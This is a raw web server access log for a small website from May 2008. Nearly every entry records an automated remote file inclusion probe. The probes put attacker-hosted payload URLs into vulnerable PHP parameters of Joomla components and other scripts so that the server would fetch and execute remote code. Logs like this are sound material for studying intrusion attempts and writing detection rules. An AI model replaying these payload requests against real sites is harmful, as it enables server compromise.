212.227.29.35 - - [25/May/2008:22:13:03 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://g4br13l.iespana.es/idsforscan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
212.227.29.35 - - [25/May/2008:22:13:03 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://g4br13l.iespana.es/idsforscan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.6.8.44 - - [25/May/2008:22:15:40 -0700] "GET /logs/access_080512.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
74.52.85.114 - - [25/May/2008:22:18:52 -0700] "GET /logs/access_080428.log//appserv/main.php?appserv_root=http://weekly.wassla.com/modules/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
74.52.85.114 - - [25/May/2008:22:18:52 -0700] "GET //appserv/main.php?appserv_root=http://weekly.wassla.com/modules/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
74.52.85.114 - - [25/May/2008:22:18:52 -0700] "GET /logs//appserv/main.php?appserv_root=http://weekly.wassla.com/modules/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
74.52.85.114 - - [25/May/2008:22:19:16 -0700] "GET /logs/access_080407.log//appserv/main.php?appserv_root=http://weekly.wassla.com/modules/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
74.52.85.114 - - [25/May/2008:22:20:27 -0700] "GET /logs//appserv/main.php?appserv_root=http://weekly.wassla.com/modules/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
74.52.85.114 - - [25/May/2008:22:20:27 -0700] "GET //appserv/main.php?appserv_root=http://weekly.wassla.com/modules/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.98.141.70 - - [25/May/2008:22:21:56 -0700] "GET /errors.php?error=http://www.ecf.cl/portal/cache/rss40.xml?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.mathstamps.com"
82.98.141.70 - - [25/May/2008:22:21:58 -0700] "GET /logs/errors.php?error=http://www.ecf.cl/portal/cache/rss40.xml?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.mathstamps.com"
76.191.102.154 - - [25/May/2008:22:22:08 -0700] "GET /logs/access_080428.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
76.191.102.154 - - [25/May/2008:22:22:08 -0700] "GET /logs/access_080428.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
76.191.102.154 - - [25/May/2008:22:22:09 -0700] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
76.191.102.154 - - [25/May/2008:22:22:09 -0700] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
76.191.102.154 - - [25/May/2008:22:22:09 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
76.191.102.154 - - [25/May/2008:22:22:09 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
76.191.102.154 - - [25/May/2008:22:24:01 -0700] "GET /logs/access_080428.log/english/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
76.191.102.154 - - [25/May/2008:22:24:02 -0700] "GET /english/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
76.191.102.154 - - [25/May/2008:22:24:02 -0700] "GET /logs/english/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
84.243.253.159 - - [25/May/2008:22:24:08 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
84.243.253.159 - - [25/May/2008:22:24:09 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
76.191.102.154 - - [25/May/2008:22:24:14 -0700] "GET /logs/access_080428.log/english/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
76.191.102.154 - - [25/May/2008:22:24:14 -0700] "GET /english/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
76.191.102.154 - - [25/May/2008:22:24:14 -0700] "GET /logs/english/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
212.241.251.88 - - [25/May/2008:22:25:03 -0700] "GET /logs/!scanhttp://ma2day.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
212.241.251.88 - - [25/May/2008:22:25:04 -0700] "GET /!scanhttp://ma2day.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
200.229.199.197 - - [25/May/2008:22:26:41 -0700] "GET /logs/classes/core/language.php?rootdir=http://www.ecf.cl/portal/cache/rss40.xml?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.mathstamps.com"
200.229.199.197 - - [25/May/2008:22:26:41 -0700] "GET /classes/core/language.php?rootdir=http://www.ecf.cl/portal/cache/rss40.xml?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.mathstamps.com"
67.228.60.242 - - [25/May/2008:22:29:16 -0700] "GET /logs/access_080428.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.228.60.242 - - [25/May/2008:22:29:16 -0700] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.228.60.242 - - [25/May/2008:22:29:16 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.197.59.3 - - [25/May/2008:22:29:23 -0700] "GET /logs/access_080428.log//index.php?option=com_facileforms&&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.197.59.3 - - [25/May/2008:22:29:24 -0700] "GET //index.php?option=com_facileforms&&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.197.59.3 - - [25/May/2008:22:29:24 -0700] "GET /logs//index.php?option=com_facileforms&&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.228.60.242 - - [25/May/2008:22:29:30 -0700] "GET /logs/access_080428.log/english/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.228.60.242 - - [25/May/2008:22:29:31 -0700] "GET /english/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.228.60.242 - - [25/May/2008:22:29:31 -0700] "GET /logs/english/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
212.241.251.88 - - [25/May/2008:22:29:52 -0700] "GET /logs//appserv/main.php?appserv_root=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
212.241.251.88 - - [25/May/2008:22:29:53 -0700] "GET //appserv/main.php?appserv_root=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
76.191.102.154 - - [25/May/2008:22:33:26 -0700] "GET /logs/access_080421.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
76.191.102.154 - - [25/May/2008:22:33:26 -0700] "GET /logs/access_080421.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
76.191.102.154 - - [25/May/2008:22:33:26 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
76.191.102.154 - - [25/May/2008:22:33:26 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
76.191.102.154 - - [25/May/2008:22:33:26 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
76.191.102.154 - - [25/May/2008:22:33:26 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
69.94.56.38 - - [25/May/2008:22:39:20 -0700] "GET /logs/access.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.hogarycasa.com/revista6/peques/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.mathstamps.com"
69.94.56.38 - - [25/May/2008:22:39:20 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.hogarycasa.com/revista6/peques/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.mathstamps.com"
69.94.56.38 - - [25/May/2008:22:39:20 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.hogarycasa.com/revista6/peques/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.mathstamps.com"
69.94.56.38 - - [25/May/2008:22:39:54 -0700] "GET /logs/access_080407.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.hogarycasa.com/revista6/peques/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.mathstamps.com"
213.197.59.3 - - [25/May/2008:22:41:18 -0700] "GET /logs//index.php?option=com_facileforms&&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.197.59.3 - - [25/May/2008:22:41:19 -0700] "GET //index.php?option=com_facileforms&&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.149.209.100 - - [25/May/2008:22:46:20 -0700] "GET /logs/access_080421.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.149.209.100 - - [25/May/2008:22:46:20 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.149.209.100 - - [25/May/2008:22:46:20 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.149.209.100 - - [25/May/2008:22:46:22 -0700] "GET /logs/access_080421.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.149.209.100 - - [25/May/2008:22:46:23 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.149.209.100 - - [25/May/2008:22:46:23 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.228.60.242 - - [25/May/2008:22:46:53 -0700] "GET /logs/access_080421.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.228.60.242 - - [25/May/2008:22:46:53 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.228.60.242 - - [25/May/2008:22:46:54 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
82.78.216.197 - - [25/May/2008:22:47:52 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.mathstamps.com"
82.78.216.197 - - [25/May/2008:22:47:52 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.mathstamps.com"
82.78.216.197 - - [25/May/2008:22:48:35 -0700] "GET /convert/mvcw.php?vwar_root=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.mathstamps.com"
82.78.216.197 - - [25/May/2008:22:48:35 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.mathstamps.com"
82.78.216.197 - - [25/May/2008:22:49:18 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.mathstamps.com"
82.78.216.197 - - [25/May/2008:22:49:18 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.mathstamps.com"
194.158.195.132 - - [25/May/2008:22:49:22 -0700] "GET /logs/access_080428.log//include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
69.94.56.38 - - [25/May/2008:22:52:04 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.larisco.com/xxx.txt??????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.mathstamps.com"
69.16.242.144 - - [25/May/2008:22:52:24 -0700] "GET /logs/access_080407.log/convert/mvcw.php?vwar_root=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
69.16.242.144 - - [25/May/2008:22:52:24 -0700] "GET /logs/access_080407.log/convert/mvcw.php?step=1&vwar_root=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
69.16.242.144 - - [25/May/2008:22:52:24 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
69.16.242.144 - - [25/May/2008:22:52:24 -0700] "GET /convert/mvcw.php?vwar_root=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
69.16.242.144 - - [25/May/2008:22:52:24 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
69.16.242.144 - - [25/May/2008:22:52:24 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.167.156.20 - - [25/May/2008:22:52:34 -0700] "GET /logs/access_080407.log/convert/mvcw.php?vwar_root=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
216.167.156.20 - - [25/May/2008:22:52:34 -0700] "GET /convert/mvcw.php?vwar_root=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
216.167.156.20 - - [25/May/2008:22:52:34 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
216.167.156.20 - - [25/May/2008:22:53:06 -0700] "GET /logs/access_080428.log/convert/mvcw.php?vwar_root=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
69.94.56.38 - - [25/May/2008:22:53:09 -0700] "GET /logs/access.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.larisco.com/xxx.txt??????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.mathstamps.com"
69.94.56.38 - - [25/May/2008:22:53:09 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.larisco.com/xxx.txt??????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.mathstamps.com"
207.7.108.240 - - [25/May/2008:22:53:13 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
207.7.108.240 - - [25/May/2008:22:53:13 -0700] "GET /convert/mvcw.php?vwar_root=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
69.94.56.38 - - [25/May/2008:22:53:38 -0700] "GET /logs/access_080407.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.larisco.com/xxx.txt??????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.mathstamps.com"
69.16.242.144 - - [25/May/2008:22:53:46 -0700] "GET /logs/access_080428.log/convert/mvcw.php?vwar_root=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
160.99.12.231 - - [25/May/2008:22:54:11 -0700] "GET /logs/access_080407.log/convert/mvcw.php?vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
212.227.251.172 - - [25/May/2008:22:54:11 -0700] "GET /convert/mvcw.php?vwar_root=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
212.227.251.172 - - [25/May/2008:22:54:11 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
160.99.12.231 - - [25/May/2008:22:54:12 -0700] "GET /convert/mvcw.php?vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
69.16.242.144 - - [25/May/2008:22:54:12 -0700] "GET /logs/access_080428.log/convert/mvcw.php?step=1&vwar_root=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
160.99.12.231 - - [25/May/2008:22:54:12 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
160.99.12.231 - - [25/May/2008:22:54:30 -0700] "GET /logs/access_080407.log/convert/mvcw.php?step=1&vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
160.99.12.231 - - [25/May/2008:22:54:31 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
160.99.12.231 - - [25/May/2008:22:54:31 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
160.99.12.231 - - [25/May/2008:22:54:45 -0700] "GET /logs/access_080428.log/convert/mvcw.php?vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
82.78.216.197 - - [25/May/2008:22:54:45 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.mathstamps.com"
82.78.216.197 - - [25/May/2008:22:54:45 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.mathstamps.com"
160.99.12.231 - - [25/May/2008:22:55:02 -0700] "GET /logs/access_080428.log/convert/mvcw.php?step=1&vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
207.7.108.240 - - [25/May/2008:22:55:03 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
207.7.108.240 - - [25/May/2008:22:55:03 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
212.241.251.88 - - [25/May/2008:22:55:49 -0700] "GET /logs/access_080407.log/!scanhttp://ma2day.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
212.241.251.88 - - [25/May/2008:22:55:49 -0700] "GET /!scanhttp://ma2day.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
212.241.251.88 - - [25/May/2008:22:55:49 -0700] "GET /logs/!scanhttp://ma2day.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
207.58.181.74 - - [25/May/2008:22:58:44 -0700] "GET /convert/mvcw.php?vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
212.227.251.172 - - [25/May/2008:22:59:18 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
84.234.255.250 - - [25/May/2008:22:59:28 -0700] "GET /logs/access_080421.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
